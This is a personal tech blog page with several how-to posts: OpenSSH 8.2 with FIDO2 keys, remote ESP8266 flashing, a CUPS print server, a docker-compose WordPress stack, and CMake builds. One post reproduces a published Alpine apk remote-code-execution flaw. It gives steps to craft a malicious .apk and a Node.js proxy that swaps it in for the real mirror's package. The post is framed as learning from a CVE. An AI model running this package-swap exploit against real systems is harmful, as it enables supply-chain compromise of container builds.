Matheus Bratfisch Cogito ergo sum

Building OpenSSH 8.2 and using FIDO2 U2F on ssh authentication

OpenSSH 8.2 was just released with support for FIDO2 U2F keys. This is a nice extra layer for security!

As this is not yet on official repository for Fedora, we will need to build openssh 8.2 if we want to test.

OpenSSH 8.2 needs libfido2 and libfido2 needs libcbor systemd-devel. There is no package for FIDO2 on Fedora 31 yet, therefore we also need to build it.

Let’s start installing some dependencies:

$ sudo dnf group install 'Development Tools'
$ sudo dnf install libselinux-devel libselinux libcbor libcbor-devel systemd-devel cmake

To install libfido:

$ git clone [email protected]:Yubico/libfido2.git
$ cd libfido2
$ (rm -rf build && mkdir build && cd build && cmake ..)
$ make -C build
$ sudo make -C build install

Here we are cloning the code and basically using their commands to install it.

With this dependency ready let’s get openssh-8.2:

$ mkdir openssl-8
$ cd openssl-8
$ mkdir test-openssh
$ wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
$ tar xvzf openssh-8.2p1.tar.gz
$ cd openssh-8.2p1

With the code in place we will use configure to prepare it:

$ ./configure --with-security-key-builtin --with-md5-passwords --with-selinux --with-privsep-path=$HOME/openssl-8/test-openssh --sysconfdir=$HOME/openssl-8/test-openssh --prefix=$HOME/openssl-8/test-openssh

Note: --with-security-key-builtin is important to have support for FIDO2 internally. This command will prepare the path as $HOME/openssl-8/test-openssh my idea here is to avoid messing with my existing ssh.

After this is completed we can make/make install

$ make
$ make install

I also had to create a udev rule:

$ sudo vim /etc/udev/rules.d/90-fido.rules

With this content:

KERNEL=="hidraw*", SUBSYSTEM=="hidraw", \
  MODE="0664", GROUP="plugdev", ATTRS{idVendor}=="1050"

After all this I entered on the binary folder

$ cd $HOME/openssl-8/test-openssh/bin

To run the binary we must use ./ otherwise it will use the other binary which are system wide and we want to run the exact one which we just build. I’m not exactly sure why, but when I was running ssh-keygen, I was having some issues to find the libfido2.so.2

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
/home/matheus/openssl-8/test-openssh/libexec/ssh-sk-helper: error while loading shared libraries: libfido2.so.2: cannot open shared object file: No such file or directory
ssh_msg_recv: read header: Connection reset by peer
client_converse: receive: unexpected internal error
reap_helper: helper exited with non-zero exit status
Key enrollment failed: unexpected internal error

In my case I found the location of this file and copied it to “/usr/lib64/libfido2.so.2”

After this when running the command to generate it without the fido2 plugged in I got:

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Key enrollment failed: device not found

Plugin the key in and trying again

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in -f /tmp/test_ecdsa_sk/test_ecdsa_sk
Your public key has been saved in -f /tmp/test_ecdsa_sk/test_ecdsa_sk.pub
The key fingerprint is:
SHA256:.../... [email protected]

The key was generated succesfully!!

Now, I needed a server which supports this. Therefore I created a dockerfile from ubuntu:20.04 with an sshd running and openssh 8.2

I’m using ubuntu:20.04 as it has libfido2 on apt and libcbor too.

FROM ubuntu:20.04
RUN apt-get update && apt-get -y install software-properties-common build-essential zlib1g-dev libssl-dev libcbor-dev wget
RUN apt-add-repository -y ppa:yubico/stable && apt-get update && apt-get -y install libfido2-dev
RUN apt-get -y install ssh && apt-get -y remove ssh
RUN wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
RUN tar xvzf openssh-8.2p1.tar.gz
RUN cd openssh-8.2p1 && ./configure --with-security-key-builtin --with-md5-passwords && make && make install 
EXPOSE 22
CMD ["/usr/local/sbin/sshd", "-D"]

To build and run this:

$ docker build -t ubuntussh .
$ docker run -p 2222:22 -v /tmp/test_ecdsa_sk.pub:/root/.ssh/authorized_keys -it ubuntussh bash

Now you will be inside the docker instance and I had to chown the authorized key file and run the sshd:

$ chown -R root:root ~/.ssh/
$ /usr/local/sbin/sshd

Open a new terminal and cd into the openssl 8 bin folder again.

SSH_AUTH_SOCK= ./ssh -o "PasswordAuthentication=no" -o "IdentitiesOnly=yes" -i /tmp/test_ecdsa_sk [email protected] -p 2222

The SSH_AUTH_SOCK is to avoid using the ssh-agent which is already running, -i to specify exactly the key I want to use.

This outputs:

Enter passphrase for key '/tmp/test_ecdsa_sk': 
Confirm user presence for key ECDSA-SK SHA256:bsIjeSdrNiB4FhxfYBoHH2sCXLiISu9sxDFNrFLgBwY

Now we are in the ubuntussh with FIDO2+password!

Hope this helps you, Matheus

Reference: https://bugs.archlinux.org/task/65513 https://github.com/Yubico/libfido2 https://www.openssh.com/txt/release-8.2 http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/

Comment

Use a remote serial port to flash an esp

Recently I got back to playing with some ESP8266 as I decided to make my home smarter. Taking a look on my boards I noticed I didn’t have any 3.3V board to flash it. Taking a closer look I found I had a raspberry pi around, so I could simply use it.

After doing the setup and being able to flash using the raspberry pi it felt too hard to be programming on it and using vnc or something like this. Therefore I decided to try to use a remote serial port.

At first I got to socat but I couldn’t get it to work as it seems it doesn’t forward some specific signals. After some googling I found ser2net which seems to be compliant with RFC2217.

To install ser2net on my raspberry pi I used:

$ sudo apt-get install ser2net

After this to create a tunnel and expose it on my machine I used:

$ ssh -L 8086:localhost:8086 [email protected]_ADDRESS '/usr/sbin/ser2net -d -C "8086:raw:600:/dev/ttyAMA0:115200"'

Basically I’m forwarding my local port 8086 and on the remote device on 8086, being raw with permission 600 with port /dev/ttyAMA0 and baudrate of 115200.

To be able to flash my ESP8266 I used:

$ esptool.py -p socket://localhost:8086 write_flash -fm dio 0x000000 BasicOTA.ino.generic.bin

Note the -p socket:// with this it will use the socket to communicate.

I hope this will be helpful for you. Matheus

Comment

Testing RCE on Alpine Linux via APK

I have been studying a little bit of security and one of the things I’m doing from time to time is reading CVE and trying to test and understand what is happening. Yesterday Max Justicz published Remote Code Execution in Alpine Linux. He found an issues on apk which is the package manager for Alpine Linux which is super popular on docker images.

Max did a great job explaining the steps and the reasoning, but I wanted to try it myself.

- Create a folder at /etc/apk/commit_hooks.d/, which doesn’t exist by default. Extracted folders are not suffixed with .apk-new.

- Create a symlink to /etc/apk/commit_hooks.d/x named anything – say, link. This gets expanded to be called link.apk-new but still points to /etc/apk/commit_hooks.d/x.

- Create a regular file named link (which will also be expanded to link.apk-new). This will write through the symlink and create a file at /etc/apk/commit_hooks.d/x.

- When apk realizes that the package’s hash doesn’t match the signed index, it will first unlink link.apk-new – but /etc/apk/commit_hooks.d/x will persist! It will then fail to unlink /etc/apk/commit_hooks.d/ with ENOTEMPTY because the directory now contains our payload.

The instructions seem simple but if you are not super familiar with how a tar file works, you may not understand it. On a tar file you can have multiple versions/files with the same name and you can extract one of them using --occurrence option. With this in mind, the instructions make a little bit more sense, so shall we try to create this file?

First of all, let’s create the directories:

sudo mkdir /etc/apk/commit_hooks.d/
mkdir folder_for_link
mkdir folder_for_real_file

Create the link:

/etc/apk/commit_hooks.d/x folder_for_link/magic

Create the real file on folder_for_real_file/magic with this content:

#!/bin/sh

echo "something" > /tmp/test-12346-YAY
echo "ha" > /testfileroot

(If it really works we should have a /tmp/test-123456-YAY file and one /testfileroot too)

Cool, now it seems we have almost everything we need! Let’s create the apk with:

tar -zcvf bad-intention.apk /etc/apk/commit_hooks.d/ -C $PWD/folder_for_link/ magic -C $PWD/folder_for_real_file/ magic

Here we are adding all this 3 things in sequence to the tar file, you can check tar content with t option:

$ tar tvf bad-intention.apk
drwxr-xr-x root/root         0 2018-09-13 19:44 etc/apk/commit_hooks.d/
lrwxrwxrwx root/root         0 2018-09-13 19:37 magic -> /etc/apk/commit_hooks.d/x
-rwxrwxrwx root/root 954 2018-09-13 23:24 magic

(Pay attention on the order of this files: create directory commit_hooks.d, creation of link and creation of file)

What should be the behavior now? Since apk on alpine runs from / it will create the folder /etc/apk/commit_hooks.k, later it will extract the link and to finish it will output the content of magic to the link which will be placed inside the X file. Note, I lost A LOT of time trying to see this behavior on tar it self, but it seems tar doesn’t have this behavior and apk implements it’s own extractor.

OK, now, we need to deliver this file when running the apk add inside docker. Here, I have updated /etc/hosts and pointed dl-cdn.alpinelinux.org to localhost. Using libraries http-mitm-proxy http-proxy request on node I have created a script to deliver the bad .apk when downloading something which has ltrace on url otherwise it will download the file and send to the docker.

var http = require('http'),
    httpProxy = require('http-proxy'),
    request = require('request'),
    fileSystem = require('fs'),
    path = require('path');

var proxy = httpProxy.createProxyServer({});

var server = http.createServer(function(req, res) {
  console.log('http://nl.alpinelinux.org' + req.url)
  if (req.url.indexOf('ltrace') > -1) {
    console.log("Trapped")
    var filePath = path.join(__dirname, 'bad-intention.apk');
    var stat = fileSystem.statSync(filePath);
    var readStream = fileSystem.createReadStream(filePath);
    readStream.pipe(res);
  } else {
      proxy = request('http://nl.alpinelinux.org' + req.url)
      proxy.on('response', function (a, b) {}).pipe(res);
  }
});

console.log("listening on port 80")
server.listen(80);

Building my docker with docker build -t alpinetest --network=host --no-cache .

FROM alpine:3.8

# RUN apk add python
RUN apk add ltrace

CMD "/bin/sh"

(If you are curious you can take a look on the test of the docker image even if it failed to build and see your files are really inside the correct places. Use docker commit CONTAINER_ID and docker run -it SHA256_STRING sh.)

This returned “The command ‘/bin/sh -c apk add ltrace’ returned a non-zero code: 1”. This happened because apk verifies the signature or the apk and try to clean up the files, but it is not able to since /etc/apk/commit_hooks.k contains a file. How to do some magic to make the apk return exit code 0? Max has found one (or two) ways of doing this.

I still need to study what exactly the python script does to update the exit code but I have tested and it really works, as a quick test you can add RUN apk add python and update folder_for_real_file/magic to call his python code.

I know this may sound simple, but it took me a while to figure out all the tiny details. If you find any mistake I made, or want to say something, drop me a line!

Matheus

Comment

Find images on chrome cache files (or any other file!)

Good night,

Recently I have deleted a few images from my image which the old link was broken on the last few days. I decided to try to find them on the Google Chrome Cache. The url chrome://cache was recently removed, but you can find your chrome cache files at: /home/matheus/.cache/google-chrome/Default/Cache/.

If you open it as binary, you will see it is not a file directly. There is more information embeded in the file such as URL, headers, http status code and others. We could take a look on chrome source code to extract everything from the file, not only images. But to be honest I was lazy to dig into that because I had a very specific need in this case. Chrome cache storage

Why not scan the cache files for the JPEG binary? We would need to know how to find the start/end of image. We will have:

  • bytes 0xFF, 0xD8 indicate start of image
  • bytes 0xFF, 0xD9 indicate end of image

OK. So how would we do this in python?

Open the file as binary and check if there is a JFIF or EXIF marker on it. (Just trying to ignore files we can’t process)

f = open(filepath, 'rb')

data = f.read()
if 'JFIF' not in data and 'Exif' not in data:
	return

Now let’s iterate over all the bytes trying to find that specific sequence. To achieve this let’s have a prev which will have the value of the previous byte, pos to know which position we’re at and an array for SOI (Start of image) and EOI (End of Image) which will hold the positions for this markers. If the previous char is FF and the current one is D8, it will append to SOI, if it is D9 it will append to EOI.

prev = None
soi = []
eoi = []
pos = 0
for b in data:
	if prev is None:
		prev = b
		pos = pos + 1
		continue
	if prev == chr(0xFF):
		if b == chr(0xD8):
			soi.append(pos-1)
		elif b == chr(0xD9):
			eoi.append(pos-1)
	prev = b
	pos = pos + 1

We can get the SOI e EOI and save it. The only magic we will be doing here is getting the first SOI and the last SOI or EOI depending on each one is bigger.

path, filename = os.path.split(filepath)
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, 0), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2])

file.close()

print(filename, "SOI", soi, len(soi))
print(filename, "EOI", eoi, len(eoi))

This code will save only one image. If you want you could iterate over the SOI and EOI and save multiple files.

Would this be some kind of file carving?

I hope this helps you! Matheus

Get this script create the OUTPUT_FOLDER and run it as python yourfile.py filetocheck, this version should be able to handle multiple images inside the same file. Now you can check and output stream for instance.

import os
import glob
import sys

OUTPUT_FOLDER = "output-this2"


def save_file(data, path, filename, count, eoi, soi):
	file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, count), 'wb')
	m1 = soi[0]
	m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
	file.write(data[m1:m2])
	file.close()

def extract(filepath):
	count = 0
	f = open(filepath, 'rb')

	data = f.read()
	if 'JFIF' not in data and 'Exif' not in data:
		return

	path, filename = os.path.split(filepath)

	old_soi = []
	old_eoi = []
	prev = None
	soi = []
	eoi = []
	eoi_found = False
	pos = 0
	for b in data:
		if prev is None:
			prev = b
			pos = pos + 1
			continue
		if prev == chr(0xFF):
			if b == chr(0xD8):
				if eoi_found:
					save_file(data, path, filename, count, eoi, soi)
					old_soi = old_soi + soi
					old_eoi = old_eoi + eoi
					soi = []
					eoi = []
					count = count + 1
					eoi_found = False
				soi.append(pos-1)
			elif b == chr(0xD9):
				eoi.append(pos-1)
				eoi_found = True
		prev = b
		pos = pos + 1

	save_file(data, path, filename, count, eoi, soi)
	print(filename, "SOI", soi, len(old_soi))
	print(filename, "EOI", eoi, len(old_eoi))

def main():
	if len(sys.argv) < 2:
		sys.exit(1)

	extract(sys.argv[1])

if __name__=="__main__":
	main()

Reference: https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images

Comment

Printer connected to Raspberry PI accessable from network.

Hey guys,

For a long time my father has beem complaining that using the printer wasn’t practical enough, so to solve this I decided to add a Raspberry pi Zero W connected to my printer (HP Deskjet F2050) and share the printer using CUPS.

Initially you need to connect to your RPi and install CUPS.

sudo apt-get install cups

If you want to have a webinterface to configure it from your local network, update /etc/cups/cupsd.conf

sudo vim /etc/cups/cupsd.conf

Find the line:

Listen localhost:631

And update it to:

# Listen localhost:631
Port 631

You will have multiple <Location, if you want to be able to access only from your computer, add Allow from YOUR_IP for every section. Example:

<Location />
  Order allow,deny
  Allow from 10.0.0.2
</Location>

(If you want from any, use Allow from all)

Add your user (in my case PI) to lpadmin group.

sudo usermod -a -G lpadmin pi

Access your Raspberry Pi ip on your browser on port 631 (https://RPI_IP:631/).

Go to Administration - Add printer Menu. You should see your local printer there, select it and follow the wizard to setup it.

If you’re using HP printer and can’t find yours, try:

sudo apt-get install hplip

And reboot.

Let me know if you have any problems.

See you, Matheus

Comment

Update default git commit author and reset for commit.

If you would like to set your global git author, use:

git config --global user.name "Your name"
git config --global user.email "[email protected]"

After having it set globally, you can to set your git author per project using:

git config user.name "Your name"
git config user.email "[email protected]"

And a bonus, If you need to reset the git commit author:

git commit --amend --reset-author

If you want to do it for multiple commits:

git rebase -i <COMMIT_HASH>

See you, Matheus

Comment

Docker-compose with PHP-FPM, sendmail, nginx, mariadb serving jekyll and wordpress

As I explained recently, I had a blog running Wordpress and decided to move to Jekyll but there was a catch, I didn’t want to loose any link I had to my wordpress blog, to achieve this, I setup an nginx which will try to find a static file from jekyll and if it is not found it will fallback to Wordpress.

I was running my server on ec2 instance with RDS and it was becoming a little bit expensive, so I decided to move everything to one machine and dockerize my setup so I could easily switch my servers.

To achieve this, I have created a docker-compose with:

  • PHP-FPM and sendmail to process php and sendmail
  • Nginx to serve jekyll static files and if they’re not found serve my old wordpress blog
  • MariaDB as my Database for Wordpress
version: '3'
services:
  fpm:
    # image: php:7.0-fpm-alpine
    build: php7fpm
    restart: always
    volumes:
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./php7fpm/sendmail.mc:/usr/share/sendmail/cf/debian/sendmail.mc
      - ./php7fpm/gmail-auth.db:/etc/mail/authinfo/gmail-auth.db
    ports:
      - "9000:9000"
    links:
      - mariadb 
    hostname: boarders.com.br
  
  nginx:
    image: nginx:1.10.1-alpine
    restart: always
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/app.vhost:/etc/nginx/conf.d/default.conf
      - ./logs/nginx:/var/log/nginx
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./jekyll.matbra.com/:/var/www/jekyll.matbra.com
    ports:
      - "80:80"
      - "443:443"
    links:
      - fpm

  mariadb:
    image: mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=yourpassword
      - MYSQL_DATABASE=
    volumes:
    -   ./data/db:/var/lib/mysql

PHP-FPM container:

I’m using a custom Dockerfile which comes from php:7.0-fpm and add sendmail support and mysql extension. There is a custom starter script which will run sendmail + php-fpm. (I know I should create a specific container for sendmail)

On this container I’m basically mapping some php files and config files:

  • ./wordpress.matbra.com to /var/www/wordpress.matbra.com which are my wordpress files
  • ./php7fpm/sendmail.mc to /usr/share/sendmail/cf/debian/sendmail.mc which is my configuration file for sendmail
  • ./php7fpm/gmail-auth.db to /etc/mail/authinfo/gmail-auth.db which is the password for my gmail Configuring gmail as relay to sendmail

I’m also mapping the port 9000 to 9000, so I will communicate with PHP-FPM on this ports, creating a link to mariadb and naming my hostname.

NGINX container:

I’m using the regular nginx alpine with some maps:

  • ./nginx/nginx.conf to /etc/nginx/nginx.conf which is my nginx configuration
  • ./nginx/app.vhost to /etc/nginx/conf.d/default.conf which is my website configuration with Jekyll falling back to wordpress
  • ./logs/nginx to /var/log/nginx which will be my log directory
  • ./wordpress.matbra.com/ to /var/www/wordpress.matbra.com which is the place where nginx can find wordpress website
  • ./jekyll.matbra.com/ to /var/www/jekyll.matbra.com which is the place where nginx can find jekyll website

I’m also mapping ports 80 to 80 and 443 to 443 and create a link to PHP-FPM so nginx can communicate with fpm container.

MARIADB container:

No mistery here, regular mariadb image, with a mapping for data and some environment variables.

Because I’m not adding my website files to the image, I have created a command init.sh to remove website directory and clone website from git. There is a command called update-config.sh to update wp-config.php file with the correct environment variables.

With this I can easily spin up a new machine with my website structure.

https://github.com/x-warrior/blog-docker

I hope this will be helpful for you. Matheus

Comment

Install ZNC IRC Bouncer on AWS Linux

If you want to install ZNC IRC Bouncer you will need CMake, but AWS Linux CMake is too old. (Update your cmake to 3.x)[http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux.html]

Now you will need git to clone the ZNC source code and openssl-devel to have ssl support

# yum install git openssl-devel

Clone ZNC source code

$ git clone https://github.com/znc/znc.git

Enter on the source code folder

$ cd znc

Initialize submodules

$ git submodule update --init --recursive

Install it with:

$ cmake . 
$ make
# make install (run this as root #)

Configure it with:

$ znc --makeconf

Best regards, Matheus

Comment

Install Cmake 3 on AWS Linux

If you are trying to build something using CMake and is getting the error: “CMake 3.1 or higher is required. You are running version 2.8.12.2”

You can manually install this CMake version, to do this, I removed the previous CMake.

# yum remove cmake

Tested if it was really removed

$ cmake 
-bash: /usr/bin/cmake: No such file or directory

Install G++

# yum install gcc-c++

Download latest version from: Cmake Download

$ wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz

Extract it:

$ tar -xvzf cmake-3.10.0.tar.gz

Enter on cmake folder

$ cd cmake-3.10.0

Install it with:

# ./bootstrap
# make
# make install

Now you should have cmake under /usr/local/bin/cmake

Best regards, Matheus

Comment

Loopback model migration using postgresql database

I have been playing with Loopback, initially I was just declaring models and use in memory, but now I got to a point where I need to have a persistent database.

I couldn’t find how to keep my database synced with my models easily. I’m not sure if I’m not that familiar with Loopback yet, or if their documentation is not clear enough.

To create a script to sync your models with your database you can create a file under bin/ called autoupdate.js and add the following:

var path = require('path');

var app = require(path.resolve(__dirname, '../server/server'));
var ds = app.datasources.db;
ds.autoupdate(function(err) {
  if (err) throw err;
  ds.disconnect();
});

The code is pretty simple, it will fetch the app from server.js, grab the datasource and run the autoupate command. You could use automigrate, but this one will clean the database every time, so pay attention on this.

I think this will work for most of datasources, but if it doesn’t work for yours, drop me a line. I can try to help :D

Matheus

PS: Loopback will not create migrations and do a proper job as Django, sometimes you can get to weird states, it seems Loopback works better with NoSQL databases.

Comment